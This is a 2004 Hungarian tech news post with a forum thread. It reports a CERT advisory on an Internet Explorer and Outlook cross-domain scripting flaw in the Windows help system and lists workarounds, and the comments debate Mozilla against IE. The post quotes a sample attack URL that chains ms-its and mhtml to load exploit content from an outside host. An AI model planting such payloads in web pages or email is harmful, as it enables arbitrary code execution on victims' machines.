Aki még nem váltott Windows alatt IE-ről, annak itt az ideje!

Microsoft, Windows

Új sebezhetőséget fedeztek fel a biztosággal foglalkozó szakemberek a minap a Windows operációs rendszerek help rendszerében. A CERT jelentése szerint a jelentős hibának minősíthető sebezhetőség azokat érinti, akik Internet Exploler böngészőt vagy Outlook levelezőt használnak. A hibára jelenleg javítás és vírus definíciós file nincs, viszont exploit az már van ``in wild'', azaz közkézen. A CERT szerint minden olyan Windows rendszer érintett a hibában amelyik Internet Explolert futtat. A hiba egy ún. ``cross-domain scripting vulnerability'' az IE-ben, amely lehetővé teszi a támadónak, hogy tetszőleges kódot futtasson annak a felhasználónak a neve alatt, amely az IE-t futtatja (ami tapasztalataim szerint számos esetben a ``administrator'' felhasználó - trey).



A ``támadó'' oldal vagy levél az alábbihoz hasonló üzenetet tartalmazhat:


ms-_its:mhtml:file://C:
osuchfile_mht!http://www.example.com//exploit_chm::exploit_html



Nem csak az IE böngészőt használók érintettek, hanem azok is akik Outlook alatt HTML tartalmú leveleket olvasnak (pl. spam-ok, hírlevelek, stb.).

Van workaround a hibára. Registry módosítással (ITS protocol handlers letiltással), és az IE böngésző biztonsági szintjének emelésével (pl. Active-X letiltással, azzal, hogy nem clikk-elük bejövő email-re, instant üzenetekre, web fórumokon található linkekre, Internet relay chat (IRC) csatornák linkjeire, stb.) segíthetünk magunkon.

Szerintem egyszerűbb Mozillát használni :-)

A hiba bejelentése itt.

( Chip | 2004. 04. 09., p – 12:36 )

Kivancsi vagyok, hogy a Mr."informatikarol szakszeruen" mikor fog errol beszamolni?

Nesze neked biztonsag...

( uid_1683 | 2004. 04. 09., p – 13:36 )

Csak eszembe jutott:

Az Apeh nemrég bevezetett egy (állításuk szerint) hiper-szuper biztonságos rendszert az adobevallások leadásához. Mit gondoltok vajh mely böngésző, az, ami alól használni lehet??

"A hiba nem sulyos. Barki konnyen vedekezhet ellene: Allutsuk magasbb szintre a biztonsagot (klikk a csuszkara es kozben huzzuk az egeret felfele) vagy a tulajdonsagok menupont alatt az ActiveX melletti pipara kattintva deaktivaljuk az applikacioban. Innen is latszik, hogy az Internet Explorer milyen nagyszeru szoftver, hogy javitas nelkul is ki lehet kapcsolni a hibakat. Kulonosen nagy gratula a Microsoft secutiry csoport gyorsasaganak, mivel a frissites nemsokara elerheto lesz a Windows update-en keresztul. (Klikk a jobb also sarokban levo foldogmbol kijovo feher felhore amint megerkezett.) Innen is latszik, hogy a vilag legnagyobb szoftver cege a Microsoft halalosan komolyan veszi a biztonsagot."

Szerintem valami hasonlo lesz. :}

Lehet, es nem is az a gond, hogy ott IS mukodik, inkabb az, hogy sehol mashol. Sot tovabbmegyek, az egesz program rendszer kizarolag win alatt uzemel, viszont a kozeljovoben szeretnek kiterjeszteni ezt a rendszert minden allampolgarra. Ebben a formaban pedig ez eros diszkriminacio szvsz. Ahhoz, hogy leadjak egy adobevallast, vasaroljak sokezer fortintert egy oprendszert? Ez egy kicsit eros.....

( Bártházi András | 2004. 04. 09., p – 14:48 )

Azért hozzá kell tenni, hogy a bejelentésben leírják, nem biztos, hogy megoldás egy másik böngésző használata. :( A helyes javaslat: írtsuk le gyökerestül az Internet Explorert a gépünkről...

Valóban, de mivel az IE-t nem tudod leszedni (vagy le lehet?), a legjobb megoldas, hogy mast hasznalsz helyette.

SZVSZ, ha a Windows userek IE helyett Mozilla-t, Opera-t, az Outlook es Outlook Express helyett meg valami mas levelezot hasznalnak a virusok 50%-ka hatastalan lenne rajuk. Mert egy reszuk az ezekben levo funciokra epit (betekinto nezet, stb.).

Valahogy ki lehet írtani (pl. itt vannak jó hozzászólások [sillydog.org]), nem annyira a rendszer része, mint hirdetik... Ha más böngészőt, levelezőt használsz, viszont nem 100%, hogy megoldja a problémát (lásd bejelentés). Ugyanis az a számára ismeretlen protokollt érzékelve, könnyen előfordulhat, hogy nem tud vele mit kezdeni, és meghívja rá az Explorert... És akkor ugyanott vagyunk. A problémát tovább fokozza, hogy gyakorlatilag a bug a *.chm help fájlokhoz kapcsolódóan van (lásd Goba hozzászólását [www.weblabor.hu])

mivel az IE nem csak a egy bongeszo, hanem az egesz windows szerves resze (gondoskodtak rola nefelj :-), nem hiszem, hogy azt maradando karosodas nelkul el lehetne tavolitani. Nekem meg soha nem sikerult... pedig probaltam mar nem egyszer elhiheted :-)

Jol, jol de sajnos nem mindenki teheti meg, hogy ne hasznaljon, es nem mindenki teheti meg, hogy ne szupportaljon olyanokat, akinek muszaj hasznalni :-)

Mivel ok nem ertenek hozza, azoknak kell helyettuk is figyelni, akik azzal vannak megbizva, hogy helyettuk figyeljenek :-)

Amikor a hibakat bejelentettek (2004. marcius), a legutolso stabil verzio az 1.6 volt. A hibak mar az 1.5-ben javitva voltak (2203. oktober). Meg a Debian Sarge-ban is :-) pedig az nem a kapkodasrol hires.

Szoval nem a current stable verzio volt hibas, mint jelen esetben, hanem a sok honappal azelott kiadottak. Aki nem frissit az meg vessen magara. 5 honap frissites nelkul? Kerem van ilyen luzer?

( handler | 2004. 04. 09., p – 21:17 )

A mozilla sajnos messzirol sem tokeletes. (Es itt nem fikazni akarom) Pl: apache & mozilla ssl client certificate nem igazan a mukodo dolgok koze tartozik. Az a gaz, hogy ugyanez mukodik IE es Opera eseten...

Amire gondolsz, a böcsületes neve XPlite/2000lite. Egyes hiresztelések szerint 350 megáig képes legyalulni a WinXP-t, nekem 500 megára sikerült. :) IE Outlook, Media Player, meg minden felesleges #&@{-t el lehet vele távolítani.

Linket nem tudok adni, de sztem bármilyen p2p hálózaton megtalálod XPlite vagy 2000lite néven

Sztem senki nem állította, hogy tökéletes, de azért az is gáz, mikor az IE nem képes kezelni alapvető CSS2-es property-ket (max-width, fixed position) Hogy az átlátszó PNG supportról (illetve annak hiányáról) ne is beszéljek. Én sem fikázom az IE-t, de lassan ideje lenne kicsit fejleszteni rajta... mert úgy tűnik Microsofték leálltak a fejlesztéssel... illetve most már javításokat sem adnak ki hozzá...? :-D

pedig furcsa mod, mukodik sok szazezer host eseten ez a dolog. Ha nalad nem, akkor lehet nem a bongeszo a hibas, hanem szar a certificate. De ha megis bug lenne, akkor szabad az ut a bugzilla.mozilla.org -ra, keresni es ha nem talalsz hasonlo bugot, beirni.

Akkor olvasd el meg1x mit irtam. Az a sokszazezer host

sima ssl-t hasznal, ami nem egy es ugyanaz mint a client

side certificate. Egyebkent tudom, hogy nem (jol) mukodik,

ezt mar a levlistakon kifejtettek, es vagy 200 bug be is van jegyezve ezzel kapcsolatban....

>A mozilla sajnos messzirol sem tokeletes.

Nyilvan. Tokeletes szoftver nincs. De nem veletlen, hogy ha nagyon muszaj windowst hasznalnom, akkor Mozillat hasznalok alatt. Mekkora ROTFL mar az, hogy az IE nem tud tabbed browseing-ot? Minden oldalhoz kulon ablakot nyitni? Hat hol vagyunk a kozepkorban? :-)

Na nalam mar itt elverzik az IE, a tobbi sz@rsagarol nem is beszelve...

Amikor az 5.x-es IE verzióra jött ki valami hiba akkor is ugyanez a lázadozás volt, pedig már régóta kinn volt a 6.0. De egyébként lényegtelen... Minden szoftver tele van hibákkal, se a Mozillát nem tartom jobb böngészőnek, se mást. Sőt! Jó böngészővel még nem is találkoztam.

Az a baj, h. a jó öreg 98lite-al ellentétben ez a változat már nem tartalmaz olyan radikális beállításokat, amikkel tényleg számottevően le lehet csökkenteni az XP/2000 méretét (gyakorlatilag neten fellelhető leírások alapján -bár kicsit több kézimunkával- bárki ki tudja ezeket szedni a windowsból)